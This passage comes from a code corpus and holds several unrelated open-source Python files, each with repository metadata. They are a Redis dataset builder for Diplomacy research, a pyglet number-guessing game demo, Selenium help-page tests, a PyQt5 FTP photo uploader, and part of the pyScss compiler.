    - Saves the Redis database on disk for faster boot time.
"""
import logging
import os
import pickle
import shutil
from threading import Thread
from tqdm import tqdm
from diplomacy_research.models.training.memory_buffer import MemoryBuffer
from diplomacy_research.models.training.memory_buffer.expert_games import save_expert_games
from diplomacy_research.proto.diplomacy_proto.game_pb2 import SavedGame as SavedGameProto
from diplomacy_research.utils.process import start_redis
from diplomacy_research.utils.proto import bytes_to_zlib, bytes_to_proto, read_next_bytes
from diplomacy_research.settings import PROTO_DATASET_PATH, REDIS_DATASET_PATH, WORKING_DIR, \
PHASES_COUNT_DATASET_PATH, IN_PRODUCTION
# Constants
LOGGER = logging.getLogger(__name__)
def run(**kwargs):
""" Run the script - Determines if we need to build the dataset or not. """
del kwargs # Unused args
if os.path.exists(REDIS_DATASET_PATH):
LOGGER.info('... Dataset already exists. Skipping.')
else:
build()
def build():
""" Building the Redis dataset """
if not os.path.exists(PROTO_DATASET_PATH):
raise RuntimeError('Unable to find the proto dataset at %s' % PROTO_DATASET_PATH)
# Creating output directory if it doesn't exist
os.makedirs(os.path.join(WORKING_DIR, 'containers', 'redis'), exist_ok=True)
# Starting the Redis server and blocking on that thread
redis_thread = Thread(target=start_redis, kwargs={'save_dir': os.path.join(WORKING_DIR, 'containers'),
'log_file_path': os.devnull,
'clear': True})
redis_thread.start()
# Creating a memory buffer object to save games in Redis
memory_buffer = MemoryBuffer()
memory_buffer.clear()
# Loading the phases count dataset to get the number of games
total = None
if os.path.exists(PHASES_COUNT_DATASET_PATH):
with open(PHASES_COUNT_DATASET_PATH, 'rb') as file:
total = len(pickle.load(file))
progress_bar = tqdm(total=total)
# Loading dataset and converting
LOGGER.info('... Creating redis dataset.')
with open(PROTO_DATASET_PATH, 'rb') as file:
while True:
saved_game_bytes = read_next_bytes(file)
if saved_game_bytes is None:
break
progress_bar.update(1)
saved_game_proto = bytes_to_proto(saved_game_bytes, SavedGameProto)
save_expert_games(memory_buffer, [bytes_to_zlib(saved_game_bytes)], [saved_game_proto.id])
# Saving
memory_buffer.save(sync=True)
# Moving file
redis_db_path = {True: '/work_dir/redis/saved_redis.rdb',
False: os.path.join(WORKING_DIR, 'containers', 'redis', 'saved_redis.rdb')}.get(IN_PRODUCTION)
shutil.move(redis_db_path, REDIS_DATASET_PATH)
LOGGER.info('... Done creating redis dataset.')
# Stopping Redis and thread
progress_bar.close()
memory_buffer.shutdown()
redis_thread.join(timeout=60)
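# Illustrative note (not part of the original script): the module is normally
# driven by the surrounding dataset pipeline, but it can also be invoked
# directly, assuming PROTO_DATASET_PATH already exists and this module path:
#
#   from diplomacy_research.scripts.dataset import dataset_010_redis
#   dataset_010_redis.run()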
|
diplomacy/research
|
diplomacy_research/scripts/dataset/dataset_010_redis.py
|
Python
|
mit
| 3,931 | 0.00407 |
#!/usr/bin/env python3
# vim: tw=76
import kxg
import random
import pyglet
LOWER_BOUND, UPPER_BOUND = 0, 5000
class World(kxg.World):
"""
Keep track of the secret number, the range of numbers that haven't been
eliminated yet, and the winner (if there is one).
"""
def __init__(self):
super().__init__()
self.number = 0
self.lower_bound = 0
self.upper_bound = 0
self.winner = 0
class Referee(kxg.Referee):
"""
Pick the secret number.
"""
def on_start_game(self, num_players):
number = random.randint(LOWER_BOUND + 1, UPPER_BOUND - 1)
self >> PickNumber(number, LOWER_BOUND, UPPER_BOUND)
class PickNumber(kxg.Message):
"""
Pick the secret number and communicate that choice to all the clients.
"""
def __init__(self, number, lower_bound, upper_bound):
self.number = number
self.lower_bound = lower_bound
self.upper_bound = upper_bound
def on_check(self, world):
if world.number:
raise kxg.MessageCheck("number already picked")
def on_execute(self, world):
world.number = self.number
world.lower_bound = self.lower_bound
world.upper_bound = self.upper_bound
class GuessNumber(kxg.Message):
"""
Make a guess on behalf of the given player. If the guess is
right, that player wins the game. If the guess is wrong, the
range of numbers that the secret number could be is narrowed
accordingly.
"""
def __init__(self, player, guess):
self.player = player
self.guess = guess
def on_check(self, world):
pass
def on_execute(self, world):
if self.guess == world.number:
world.winner = self.player
world.end_game()
elif self.guess < world.number:
world.lower_bound = max(self.guess, world.lower_bound)
elif self.guess > world.number:
world.upper_bound = min(self.guess, world.upper_bound)
class Gui:
"""
Manage GUI objects like the window, which exist before and after the game
itself.
"""
def __init__(self):
self.width, self.height = 600, 400
self.window = pyglet.window.Window()
self.window.set_size(self.width, self.height)
self.window.set_visible(True)
self.label = pyglet.text.Label(
"",
color=(255, 255, 255, 255),
font_name='Deja Vu Sans', font_size=32,
x=self.width//2, y=self.height//2,
anchor_x='center', anchor_y='center',
)
def on_refresh_gui(self):
self.window.clear()
self.label.draw()
class GuiActor(kxg.Actor):
"""
Show the players the range of numbers that haven't been eliminated yet,
and allow the player to guess what the number is.
"""
def __init__(self):
super().__init__()
self.guess = None
self.prompt = "{0.lower_bound} < {1} < {0.upper_bound}"
def on_setup_gui(self, gui):
self.gui = gui
self.gui.window.set_handlers(self)
def on_draw(self):
self.gui.on_refresh_gui()
def on_mouse_scroll(self, x, y, dx, dy):
# If the user scrolls the mouse wheel, update the guess accordingly.
if self.guess is None:
if dy < 0:
self.guess = self.world.upper_bound
else:
self.guess = self.world.lower_bound
self.guess = sorted([
self.world.lower_bound,
self.guess + dy,
self.world.upper_bound,
])[1]
self.on_update_prompt()
def on_key_press(self, symbol, modifiers):
# If the user types a number, add that digit to the guess.
try:
digit = int(chr(symbol))
self.guess = 10 * (self.guess or 0) + digit
except ValueError:
pass
# If the user hits backspace, remove the last digit from the guess.
if symbol == pyglet.window.key.BACKSPACE:
if self.guess is not None:
guess_str = str(self.guess)[:-1]
self.guess = int(guess_str) if guess_str else None
# If the user hits enter, guess the current number.
if symbol == pyglet.window.key.ENTER:
if self.guess:
self >> GuessNumber(self.id, self.guess)
self.guess = None
self.on_update_prompt()
@kxg.subscribe_to_message(PickNumber)
@kxg.subscribe_to_message(GuessNumber)
def on_update_prompt(self, message=None):
guess_str = '???' if self.guess is None else str(self.guess)
self.gui.label.text = self.prompt.format(self.world, guess_str)
def on_finish_game(self):
self.gui.window.pop_handlers()
if self.world.winner == self.id:
self.gui.label.text = "You won!"
else:
self.gui.label.text = "You lost!"
class AiActor(kxg.Actor):
"""
Wait a random amount of time, then guess a random number within the
remaining range.
"""
def __init__(self):
super().__init__()
self.reset_timer()
def on_update_game(self, dt):
self.timer -= dt
if self.timer < 0:
lower_bound = self.world.lower_bound + 1
upper_bound = self.world.upper_bound - 1
guess = random.randint(lower_bound, upper_bound)
self >> GuessNumber(self.id, guess)
self.reset_timer()
def reset_timer(self):
self.timer = random.uniform(1, 3)
if __name__ == '__main__':
kxg.quickstart.main(World, Referee, Gui, GuiActor, AiActor)
|
kxgames/kxg
|
demos/guess_my_number.py
|
Python
|
mit
| 5,672 | 0.001587 |
from selenium_test_case import SeleniumTestCase
class DocsTest(SeleniumTestCase):
def test_links_between_pages(self):
self.open_path('/help')
self.assert_text_present('Frequently Asked Questions')
self.click_and_wait('link=Terms of Service')
self.assert_text_present('Terms of Service for Google Resource Finder')
self.click_and_wait('link=Privacy')
self.assert_text_present('Google Resource Finder Privacy Policy')
self.click_and_wait('link=Help')
self.assert_text_present('Frequently Asked Questions')
def test_languages(self):
# English (en)
self.open_path('/help?lang=en')
self.assert_text_present('Frequently Asked Questions')
self.click_and_wait('link=Terms of Service')
self.assert_text_present('Terms of Service for Google Resource Finder')
self.click_and_wait('link=Privacy')
self.assert_text_present('Google Resource Finder Privacy Policy')
self.click_and_wait('link=Help')
self.assert_text_present('Frequently Asked Questions')
# Spanish (es-419)
self.open_path('/help?lang=es')
self.assert_text_present('Preguntas frecuentes')
self.click_and_wait('link=Condiciones del servicio')
self.assert_text_present(
'Condiciones del servicio del Buscador de recursos de Google')
self.click_and_wait(u'link=Privacidad')
self.assert_text_present(
u'Pol\u00edtica de privacidad del Buscador de recursos de Google')
self.click_and_wait(u'link=Ayuda')
self.assert_text_present('Preguntas frecuentes')
# French (fr)
self.open_path('/help?lang=fr')
self.assert_text_present(u'Questions fr\u00e9quentes')
self.click_and_wait('link=Conditions d\'utilisation')
self.assert_text_present(
u'Conditions d\'utilisation de Google Resource Finder')
self.click_and_wait(u'link=Confidentialit\u00e9')
self.assert_text_present(
u'R\u00e8gles de confidentialit\u00e9 de Google Resource Finder')
self.click_and_wait(u'link=Aide')
self.assert_text_present(u'Questions fr\u00e9quentes')
# Kreyol (ht)
self.open_path('/help?lang=ht')
self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan')
self.click_and_wait(u'link=Kondisyon S\u00e8vis yo')
self.assert_text_present(
u'Kondisyon S\u00e8vis pou Resource Finder Google')
self.click_and_wait(u'link=Vi prive')
self.assert_text_present(u'Politik Resp\u00e8 Pou Moun ak ' +
u'\u201cResource Finder\u201d nan Google')
self.click_and_wait(u'link=Ed')
self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan')
|
Princessgladys/googleresourcefinder
|
tests/docs_test.py
|
Python
|
apache-2.0
| 2,824 | 0 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys, time, os, hashlib, atexit
import ftplib
import traceback
from PyQt5.QtWidgets import QApplication, QWidget, QFileDialog
from PyQt5.QtWidgets import QPushButton, QHBoxLayout, QVBoxLayout, \
QScrollArea, QLineEdit, QCheckBox, QMessageBox, QMenu
from PyQt5 import QtGui
from PyQt5.QtGui import QIcon, QPalette, QLinearGradient, QColor, QBrush, QCursor
from PyQt5.QtCore import Qt, QObject, QThread, pyqtSignal, pyqtSlot, QEvent, QSettings
album_uploaders = {}
class MainWindow(QWidget):
_album_buttons = {}
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
def _start():
try:
self.start_work(name.text(), passwd.text(), remember.checkState())
except ftplib.error_perm as e:
QMessageBox.critical(self, 'Error', 'Неверный пароль!', QMessageBox.Ok)
except Exception as e:
s = traceback.format_exc()
QMessageBox.critical(self, 'Ошибка', 'Пожалуйста, отправьте данную информацию разработчикам:\n\n %s' % s,
QMessageBox.Ok)
self.resize(600, 400)
self.setWindowTitle('Загрузка по FTP в Фотобанк')
self.setWindowIcon(QIcon('resources/favicon.ico'))
# set layouts
name = QLineEdit(settings.login)
name.returnPressed.connect(_start)
name.setPlaceholderText('Логин в фотобанк')
passwd = QLineEdit(settings.passwd)
passwd.returnPressed.connect(_start)
passwd.setPlaceholderText('Пароль для фотобанка')
passwd.setEchoMode(QLineEdit.Password)
remember = QCheckBox('Запомнить?', checked=settings.remember)
login = QPushButton('Вход')
auth_panel = QHBoxLayout()
auth_panel.addWidget(name)
auth_panel.addWidget(passwd)
auth_panel.addWidget(remember)
auth_panel.addWidget(login)
login.clicked.connect(_start)
# login.clicked.connect(lambda: self.start_work(name.text(), passwd.text(), remember.checkState()))
btn_area = QScrollArea()
btn_area_widget = QWidget()
btn_area.setWidget(btn_area_widget)
self.__btn_area_layout = btn_area_layout = QVBoxLayout(btn_area_widget)
btn_area.setWidgetResizable(True)
central_box = QHBoxLayout()
central_box.addWidget(btn_area)
vbox = QVBoxLayout()
# vbox.addStretch()
vbox.addLayout(auth_panel)
vbox.addLayout(central_box)
self.setLayout(vbox)
self.show()
def set_ftp_credentials(self, login, passwd, remember):
# set ftp credentials
#print (login, passwd, remember)
self.__ftp_login = login
self.__ftp_passwd = passwd
self.__ftp_remember = remember
def add_album_buttons(self, albums):
# adds album buttons
layout = self.__btn_area_layout
for name in albums:
if name not in self._album_buttons:
button = AlbumButton(name, self.__ftp_login, self.__ftp_passwd)
layout.addWidget(button)
self._album_buttons[name] = button
def start_work(self, login, passwd, remember):
# start work:
# - remember credentials
# - establish connection
# - get albums
self.set_ftp_credentials(login, passwd, remember)
if remember:
save_settings(login=login, passwd=passwd, remember=remember)
self.__ftp = start_ftp(login, passwd)
albums = sort_albums(get_albums(self.__ftp))
self.add_album_buttons(albums)
    def enqueueFiles_XXX(self, album_name, fileslist):
        # NOTE: unused legacy draft, superseded by AlbumButton.enqueueFilesToUpload
        # (as written it never hands `fileslist` to the worker and calls
        # setName() with too few arguments).
        # enqueue files to specific folder uploader
worker = album_uploaders.get(album_name)
if worker is None:
# start new uploader
worker = AlbumUploader()
worker.setName(album_name)
thread = QThread(self)
worker.moveToThread(thread)
thread.started.connect(worker.process)
worker.finished.connect(thread.quit)
worker.finished.connect(worker.deleteLater)
thread.finished.connect(thread.deleteLater)
# worker.message.connect(self.text)
thread.start()
album_uploaders[album_name] = worker
def closeEvent(self, event):
# check and exit
workers = len(album_uploaders)
if workers > 0:
reply = QMessageBox.question(self, 'Закрыть программу?',
'Вы уверены, что хотите выйти? \nСейчас загружается %s альбом(а,ов)' % workers,
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply != QMessageBox.Yes:
event.ignore()
return
event.accept()
class AlbumUploader(QObject):
name = ''
finished = pyqtSignal()
message = pyqtSignal(int)
progress_message = pyqtSignal(str, float, bool)
fileslist = None
ftp = None # connection to server
i = 0
active = False
progress = 0.0
def setName(self, name, ftp_login, ftp_passwd):
self.name = name
self.ftp_login = ftp_login
self.ftp_passwd = ftp_passwd
def __str__(self):
return 'AlbumUploader @%s ftp=%s name="%s" i=%s len=%s fileslist=%s' % \
(id(self), self.ftp, self.name, self.i, len(self.fileslist), self.fileslist)
def prepareFtp(self):
self.ftp = start_ftp(self.ftp_login, self.ftp_passwd)
#print('FTP conn: %s', self.ftp)
cwd = '/' + self.name
self.ftp.cwd(cwd)
self.ftp.set_pasv(True)
self.ftp.sendcmd('TYPE I')
self.ftp.set_debuglevel(2)
def uploadFile(self, f):
# upload file to server
#print('Uploading file "%s"' % f)
fil = open(f, 'rb')
size_local = os.path.getsize(f)
basename = os.path.basename(f)
self.ftp.storbinary('STOR '+basename, fil)
size_remote = self.ftp.size(basename)
        fil.seek(0)  # rewind: storbinary() above read the file to EOF
        md5 = hashlib.md5(fil.read()).hexdigest()
#print('Uploaded file %s md5=%s size_local=%s size_remote=%s' % (f, md5, size_local, size_remote))
fil.close()
if size_remote != size_local:
raise Exception("Sizes don't match!")
def getProgress(self):
# return current progress percent
if self.startlen == 0:
return 0.0
return float(self.startlen-len(self.fileslist))/self.startlen
def updateButton(self):
# update album button style:
# progressbar
# show activity
# percent = float(self.startlen-len(self.fileslist))/self.startlen
self.progress_message.emit(self.name, self.getProgress(), self.active)
@pyqtSlot()
def process(self):
#print('START %s', self)
#print('fileslist: %s' % self.fileslist)
self.prepareFtp()
self.i = 0
self.startlen = len(self.fileslist)
self.active = True
self.updateButton()
while True:
# get first file name
#print("New load cycle by %s" % self)
try:
f = self.fileslist.pop(0)
self.uploadFile(f)
#print('sleep', self.i, len(self.fileslist), f)
self.message.emit(self.i)
self.updateButton()
# time.sleep(2.0)
# 1/(1-1)
except IndexError as err:
#print('upload fileslist is empty. \nGot error: %s\n' % err)
break
except Exception as err:
#print('Fatal!!!! \nWhile uploading file "%s" got error: \n%s' % (f, err))
traceback.print_exc(file=sys.stdout)
self.fileslist.append(f)
time.sleep(2.0)
self.prepareFtp()
#print('FINISHED')
#print('These file(s) were not uploaded: %s' % self.fileslist)
        self.active = False
self.updateButton()
self.finished.emit()
self.fileslist = []
self.startlen = len(self.fileslist)
def enqueueFiles(self, fileslist):
if self.fileslist is None:
self.fileslist = []
self.startlen = 0
for f in fileslist:
if os.path.isdir(f):
subdirfiles = [os.path.join(f, i) for i in os.listdir(f)]
self.enqueueFiles(subdirfiles)
else:
self.fileslist.append(f)
self.startlen += 1
# self.fileslist.extend(fileslist)
# self.startlen += len(fileslist)
class AlbumButton(QPushButton):
"""docstring for AlbumButton"""
drop_ready = pyqtSignal(bool)
def __init__(self, name, ftp_login, ftp_passwd):
# super(AlbumButton, self).__init__()
QPushButton.__init__(self, name)
self.name = name
self.ftp_login = ftp_login
self.ftp_passwd = ftp_passwd
# self.active = False
self.setStyleSheet(self.formatStyle())
self.setAcceptDrops(True)
self.drop_ready.connect(self.setDropReady)
# self.setToolTip('Левая кнопка - загрузить файлы\nПравая - дополнительные действия')
def contextMenuEvent(self, event):
menu = QMenu(self)
menu.addAction('Добавить файлы к альбому', self.selectFiles)
menu.show()
menu.exec_(QCursor.pos())
def mousePressEvent(self, event):
if event.type() in (QEvent.MouseButtonPress,) and event.button() == Qt.LeftButton:
self.selectFiles()
else:
super().mousePressEvent(event)
def setDropReady(self, ready):
# print (self.name, ready)
self.setProperty('dropReady', ready)
self.style().unpolish(self)
self.style().polish(self)
# self.update()
self.repaint()
def dragLeaveEvent(self, event):
self.drop_ready.emit(False)
super().dragLeaveEvent(event)
event.accept()
def dragEnterEvent(self, event):
self.drop_ready.emit(True)
super().dragEnterEvent(event)
event.accept()
def dropEvent(self, event):
urls = event.mimeData().urls()
print (urls)
self.drop_ready.emit(False)
self.enqueueFilesToUpload([u.toLocalFile() for u in urls])
event.accept()
def selectFiles(self):
# show dialog, get list of files/dir, start uploader
dialog = QFileDialog()
dialog.setFileMode(QFileDialog.AnyFile)
qfileslist = dialog.getOpenFileNames(self, u'Загрузка в альбом "%s"' % self.name)[0]
fileslist = [str(x) for x in qfileslist]
if fileslist:
self.enqueueFilesToUpload(fileslist)
def enqueueFilesToUpload(self, fileslist):
# add fileslist (str[]) to
# enqueue files to specific folder uploader
album_name = self.name
uploader = album_uploaders.get(album_name)
if uploader is None:
# start new uploader
uploader = AlbumUploader()
uploader.setName(album_name, self.ftp_login, self.ftp_passwd)
thread = QThread(self)
uploader.moveToThread(thread)
thread.started.connect(uploader.process)
uploader.finished.connect(thread.quit)
# uploader.finished.connect(lambda: print('==FINISHED'))
uploader.finished.connect(uploader.deleteLater)
thread.finished.connect(thread.deleteLater)
uploader.finished.connect(lambda: self.cleanAlbumUploaders(album_name))
uploader.progress_message.connect(self.updateProgressBar)
# uploader.message.connect(self.text)
thread.start()
album_uploaders[album_name] = uploader
uploader.enqueueFiles(fileslist) ### ???
#print('AlbumUploaders after enqueue: ', album_uploaders)
def cleanAlbumUploaders(self, album_name):
del album_uploaders[album_name]
#print('AlbumUploaders after clean: ', album_uploaders)
def formatStyle(self, percent=0.0, active=False):
# format style depending on progress level
low = percent-0.001
if low < 0.0 : low = 0
high = percent+0.001
if high >= 1.0 : high = 0.9999
color = "#d8d8d8"
if active:
color = "#ffffd8"
# self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent)
style = """QPushButton {font-size: 16pt; /* background-color: #d8d8d8; */ padding: 0.5em; margin: 0.3em;
background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,
stop: 0 green, stop: %(low)s green, stop: %(high)s %(color)s, stop: 1.0 %(color)s)}
QPushButton[dropReady="true"]:hover { background-color: #d8f0d8; font-weight: bold; }
QPushButton:hover {background-color: #d8f0d8; /* border: solid 1px green */}
""" % dict(low=low, high=high, color=color)
return style
def updateProgressBar(self, name, percent, active=False):
#print ('Updating updateProgressBar to', percent)
style = self.formatStyle(percent, active)
self.setStyleSheet(style)
if active:
# color = "#ffffd8"
self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent)
# print (style)
def start_ftp(login, passwd):
# starts ftp connection
ftp = ftplib.FTP(settings.host, login, passwd, None, 180)
ftp.encoding = 'utf-8'
ftp.set_debuglevel(level=0)
ftp.set_pasv(True)
return ftp
def get_qsettings():
'''returns QSettings with set Company and Product names'''
return QSettings(settings.company, settings.product)
def save_settings(login, passwd, remember):
qset = get_qsettings()
qset.setValue('login', login)
qset.setValue('passwd', passwd)
qset.setValue('remember', remember)
def restore_settings(settings):
qset = get_qsettings()
settings.login = qset.value('login', type=str)
settings.passwd = qset.value('passwd', type=str)
settings.remember = qset.value('remember', type=bool)
def get_albums(ftp):
#retrives albums for specified connection
def get_albums_cb(rows):
# callback for function get_albums - receives rows from LIST command
# print(rows, type(rows), repr(rows))
for row in rows.split("\n"):
name = str.split(row, maxsplit=8)[-1]
albums.append(name)
albums = []
ftp.retrlines('LIST', get_albums_cb)
return albums
def sort_albums(albums):
# sorts albums by their ids
def sorter(name):
try:
return int(name.split("-")[0])
except:
return -1
return sorted(albums, key=sorter, reverse=True)
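# Illustrative sketch: album folders are expected to be named "<id>-<title>",
# so sort_albums(['2-b', '10-a', 'misc']) -> ['10-a', '2-b', 'misc']
# (names without a numeric prefix fall back to -1 and sort last).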
if __name__ == '__main__':
try:
import settings
except Exception:
import types
settings = types.ModuleType('settings', '''Default empty login and password''')
settings.login = ''
settings.passwd = ''
settings.host = ''
        settings.remember = False
        settings.company = 'MyCompany'
        settings.product = 'MyFtpProduct'
restore_settings(settings)
app = QApplication(sys.argv)
wnd = MainWindow()
sys.exit(app.exec())
|
lisitsky/one-button-ftp
|
pyftp1.py
|
Python
|
mit
| 15,763 | 0.004916 |
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from collections import defaultdict
from enum import Enum
import logging
from pathlib import Path
import re
import sys
import warnings
try:
from collections import OrderedDict
except ImportError:
# Backport
from ordereddict import OrderedDict
import six
from scss.calculator import Calculator
from scss.cssdefs import _spaces_re
from scss.cssdefs import _escape_chars_re
from scss.cssdefs import _prop_split_re
from scss.errors import SassError
from scss.errors import SassBaseError
from scss.errors import SassImportError
from scss.extension import Extension
from scss.extension.core import CoreExtension
from scss.extension import NamespaceAdapterExtension
from scss.grammar import locate_blocks
from scss.rule import BlockAtRuleHeader
from scss.rule import Namespace
from scss.rule import RuleAncestry
from scss.rule import SassRule
from scss.rule import UnparsedBlock
from scss.selector import Selector
from scss.source import SourceFile
from scss.types import Arglist
from scss.types import List
from scss.types import Null
from scss.types import Number
from scss.types import String
from scss.types import Undefined
from scss.types import Url
from scss.util import normalize_var # TODO put in... namespace maybe?
# TODO should mention logging for the programmatic interface in the
# documentation
# TODO or have a little helper (or compiler setting) to turn it on
log = logging.getLogger(__name__)
_xcss_extends_re = re.compile(r'\s+extends\s+')
class OutputStyle(Enum):
nested = ()
compact = ()
compressed = ()
expanded = ()
legacy = () # ???
class SassDeprecationWarning(UserWarning):
# Note: DO NOT inherit from DeprecationWarning; it's turned off by default
# in 2.7 and later!
pass
def warn_deprecated(rule, message):
warnings.warn(
"{0} (at {1})".format(message, rule.file_and_line),
SassDeprecationWarning,
stacklevel=2,
)
class Compiler(object):
"""A Sass compiler. Stores settings and knows how to fire off a
compilation. Main entry point into compiling Sass.
"""
def __init__(
self, root=Path(), search_path=(),
namespace=None, extensions=(CoreExtension,),
import_static_css=False,
output_style='nested', generate_source_map=False,
live_errors=False, warn_unused_imports=False,
ignore_parse_errors=False,
loops_have_own_scopes=True,
undefined_variables_fatal=True,
super_selector='',
):
"""Configure a compiler.
:param root: Directory to treat as the "project root". Search paths
and some custom extensions (e.g. Compass) are relative to this
directory. Defaults to the current directory.
:type root: :class:`pathlib.Path`
:param search_path: List of paths to search for ``@import``s, relative
to ``root``. Absolute and parent paths are allowed here, but
``@import`` will refuse to load files that aren't in one of the
directories here. Defaults to only the root.
:type search_path: list of strings, :class:`pathlib.Path` objects, or
something that implements a similar interface (useful for custom
pseudo filesystems)
"""
# TODO perhaps polite to automatically cast any string paths to Path?
# but have to be careful since the api explicitly allows dummy objects.
if root is None:
self.root = None
else:
self.root = root.resolve()
self.search_path = tuple(
self.normalize_path(path)
for path in search_path
)
self.extensions = []
if namespace is not None:
self.extensions.append(NamespaceAdapterExtension(namespace))
for extension in extensions:
if isinstance(extension, Extension):
self.extensions.append(extension)
elif (isinstance(extension, type) and
issubclass(extension, Extension)):
self.extensions.append(extension())
elif isinstance(extension, Namespace):
self.extensions.append(
NamespaceAdapterExtension(extension))
else:
raise TypeError(
"Expected an Extension or Namespace, got: {0!r}"
.format(extension)
)
if import_static_css:
self.dynamic_extensions = ('.scss', '.sass', '.css')
self.static_extensions = ()
else:
self.dynamic_extensions = ('.scss', '.sass')
self.static_extensions = ('.css',)
self.output_style = output_style
self.generate_source_map = generate_source_map
self.live_errors = live_errors
self.warn_unused_imports = warn_unused_imports
self.ignore_parse_errors = ignore_parse_errors
self.loops_have_own_scopes = loops_have_own_scopes
self.undefined_variables_fatal = undefined_variables_fatal
self.super_selector = super_selector
def normalize_path(self, path):
if isinstance(path, six.string_types):
path = Path(path)
if path.is_absolute():
return path
if self.root is None:
raise IOError("Can't make absolute path when root is None")
return self.root / path
def make_compilation(self):
return Compilation(self)
def call_and_catch_errors(self, f, *args, **kwargs):
"""Call the given function with the given arguments. If it succeeds,
return its return value. If it raises a :class:`scss.errors.SassError`
and `live_errors` is turned on, return CSS containing a traceback and
error message.
"""
try:
return f(*args, **kwargs)
except SassError as e:
if self.live_errors:
# TODO should this setting also capture and display warnings?
return e.to_css()
else:
raise
def compile(self, *filenames):
# TODO this doesn't spit out the compilation itself, so if you want to
# get something out besides just the output, you have to copy this
# method. that sucks.
# TODO i think the right thing is to get all the constructors out of
# SourceFile, since it's really the compiler that knows the import
# paths and should be consulted about this. reconsider all this (but
# preserve it for now, SIGH) once importers are a thing
compilation = self.make_compilation()
for filename in filenames:
# TODO maybe SourceFile should not be exposed to the end user, and
# instead Compilation should have methods for add_string etc. that
# can call normalize_path.
# TODO it's not possible to inject custom files into the
# /compiler/ as persistent across compiles, nor to provide "fake"
# imports. do we want the former? is the latter better suited to
# an extension?
source = SourceFile.from_filename(self.normalize_path(filename))
compilation.add_source(source)
return self.call_and_catch_errors(compilation.run)
def compile_sources(self, *sources):
# TODO this api is not the best please don't use it. this all needs to
# be vastly simplified, still, somehow.
compilation = self.make_compilation()
for source in sources:
compilation.add_source(source)
return self.call_and_catch_errors(compilation.run)
def compile_string(self, string):
source = SourceFile.from_string(string)
compilation = self.make_compilation()
compilation.add_source(source)
return self.call_and_catch_errors(compilation.run)
def compile_file(filename, compiler_class=Compiler, **kwargs):
"""Compile a single file (provided as a :class:`pathlib.Path`), and return
a string of CSS.
Keyword arguments are passed along to the underlying `Compiler`.
Note that the search path is set to the file's containing directory by
default, unless you explicitly pass a ``search_path`` kwarg.
:param filename: Path to the file to compile.
:type filename: str, bytes, or :class:`pathlib.Path`
"""
filename = Path(filename)
if 'search_path' not in kwargs:
kwargs['search_path'] = [filename.parent.resolve()]
compiler = compiler_class(**kwargs)
return compiler.compile(filename)
def compile_string(string, compiler_class=Compiler, **kwargs):
"""Compile a single string, and return a string of CSS.
Keyword arguments are passed along to the underlying `Compiler`.
"""
compiler = compiler_class(**kwargs)
return compiler.compile_string(string)
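# A minimal usage sketch of the convenience functions above (illustrative;
# the exact whitespace depends on the chosen output style):
#
#     from scss.compiler import compile_string
#     css = compile_string("$c: red;\na { color: $c; }")
#     # with the default 'nested' style this yields roughly:
#     #   a {
#     #     color: red; }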
class Compilation(object):
"""A single run of a compiler."""
def __init__(self, compiler):
self.compiler = compiler
self.ignore_parse_errors = compiler.ignore_parse_errors
# TODO this needs a write barrier, so assignment can't overwrite what's
# in the original namespaces
# TODO or maybe the extensions themselves should take care of that, so
# it IS possible to overwrite from within sass, but only per-instance?
self.root_namespace = Namespace.derive_from(*(
ext.namespace for ext in compiler.extensions
if ext.namespace
))
self.sources = []
self.source_index = {}
self.dependency_map = defaultdict(frozenset)
self.rules = []
def should_scope_loop_in_rule(self, rule):
"""Return True iff a looping construct (@each, @for, @while, @if)
should get its own scope, as is standard Sass behavior.
"""
return rule.legacy_compiler_options.get(
'control_scoping', self.compiler.loops_have_own_scopes)
def add_source(self, source):
if source.key in self.source_index:
return self.source_index[source.key]
self.sources.append(source)
self.source_index[source.key] = source
return source
def run(self):
        # compile and manage each rule's child objects, recursively
self.parse_children()
# this will manage @extends
self.rules = self.apply_extends(self.rules)
rules_by_file, css_files = self.parse_properties()
all_rules = 0
all_selectors = 0
exceeded = ''
final_cont = ''
files = len(css_files)
for source_file in css_files:
rules = rules_by_file[source_file]
fcont, total_rules, total_selectors = self.create_css(rules)
all_rules += total_rules
all_selectors += total_selectors
# TODO i would love for the output of this function to be something
# useful for producing stats, so this stuff can live on the Scss
# class only
if not exceeded and all_selectors > 4095:
exceeded = " (IE exceeded!)"
log.error("Maximum number of supported selectors in Internet Explorer (4095) exceeded!")
if files > 1 and self.compiler.generate_source_map:
final_cont += "/* %s %s generated from '%s' add up to a total of %s %s accumulated%s */\n" % (
total_selectors,
'selector' if total_selectors == 1 else 'selectors',
source_file.path,
all_selectors,
'selector' if all_selectors == 1 else 'selectors',
exceeded)
final_cont += fcont
return final_cont
def parse_selectors(self, raw_selectors):
"""
Parses out the old xCSS "foo extends bar" syntax.
Returns a 2-tuple: a set of selectors, and a set of extended selectors.
"""
# Fix tabs and spaces in selectors
raw_selectors = _spaces_re.sub(' ', raw_selectors)
parts = _xcss_extends_re.split(raw_selectors, 1) # handle old xCSS extends
if len(parts) > 1:
unparsed_selectors, unsplit_parents = parts
# Multiple `extends` are delimited by `&`
unparsed_parents = unsplit_parents.split('&')
else:
unparsed_selectors, = parts
unparsed_parents = ()
selectors = Selector.parse_many(unparsed_selectors)
parents = [Selector.parse_one(parent) for parent in unparsed_parents]
return selectors, parents
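    # Illustrative example of the legacy syntax handled above:
    #   parse_selectors('a.foo extends .bar & .baz')
    # yields the parsed selector for 'a.foo' plus the parent selectors
    # '.bar' and '.baz' (multiple parents are '&'-delimited).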
# @print_timing(3)
def parse_children(self, scope=None):
children = []
root_namespace = self.root_namespace
for source_file in self.sources:
rule = SassRule(
source_file=source_file,
lineno=1,
unparsed_contents=source_file.contents,
namespace=root_namespace,
)
self.rules.append(rule)
children.append(rule)
for rule in children:
self.manage_children(rule, scope)
self._warn_unused_imports(self.rules[0])
def _warn_unused_imports(self, rule):
if not rule.legacy_compiler_options.get(
'warn_unused', self.compiler.warn_unused_imports):
return
for name, file_and_line in rule.namespace.unused_imports():
